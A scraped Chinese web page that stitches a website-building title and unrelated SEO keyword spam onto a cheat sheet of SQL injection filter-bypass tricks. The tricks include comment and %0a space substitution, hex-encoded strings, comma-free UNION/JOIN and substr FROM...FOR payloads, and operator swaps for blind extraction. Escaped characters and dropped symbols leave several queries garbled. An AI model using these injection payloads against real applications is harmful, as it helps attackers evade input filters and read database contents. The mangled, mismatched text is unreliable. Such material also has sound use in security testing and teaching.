企业官网建设流程全解析

门户网站静态页面,忘记了wordpress登录密码怎么办,深圳高端网站建设电话,十大设计创意产品网站一、背景在平时的sql注入不乏出现会一些注入语句进行过滤的情况#xff0c;如对空格、引号之类的进行过滤#xff0c;本文在这里就对一些平时经常用到的过滤方式进行一些总结#xff0c;希望能够给到大家参考。二、输入内容过滤一、空格过滤1、采用注释符的形式#xff1a;…一、背景在平时的sql注入不乏出现会一些注入语句进行过滤的情况如对空格、引号之类的进行过滤本文在这里就对一些平时经常用到的过滤方式进行一些总结希望能够给到大家参考。二、输入内容过滤一、空格过滤1、采用注释符的形式/**/从图中mysql能正确执行sql语句说明靠/**/可行的。2、采用%0a3、采用括号如select(user())from dual where(11)and(22)二、引号过滤直接采用十六进制的形式直接用16进制代表整个字符串。原始情况select column_name from information_schema.tables where table_nameusers改成用十六进制的情况select column_name from information_schema.tables where table_name0x7573657273三、逗号过滤1、join绕过简单注入语句UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c2、substr和mid()可以使用from for的方法如select ascii(substr(database(),1,1))115;select ascii(mid(database(),1,1))115;变成select ascii(substr(database() from 2 for 1))115;select ascii(mid(database() from 1 for 1))115;3、limit可使用offest绕过select * from users limit 1,2;select * from users limit 2 offset 1; 意思是跳过第一条输出两条4、绕过in里面的逗号原始:SELECT * FROM users WHERE id IN (1,2,3);改之后SELECT * FROM users WHERE id1 OR id2 OR id3;四、比较符号被过滤1、greatestgreatest(n1,n2,n3,...) //返回其中的最大值2、strcmpstrcmp(str1,str2) //当str1str2返回0当str1str2返回1当str1str2返回-13、between and如SELECT 5 BETWEEN 1 AND 10; -- 返回 1 (true)SELECT c BETWEEN a AND z; -- 返回14、inSELECT 5 IN (1, 3, 5, 7); -- 返回 1 (true)SELECT admin IN (user, guest, admin); -- 返回 1SELECT root IN (admin, user); -- 返回 0 (false)5、直接用等号我门做比较也不一定非得用大于小于符号也可以用等号代替使用。aa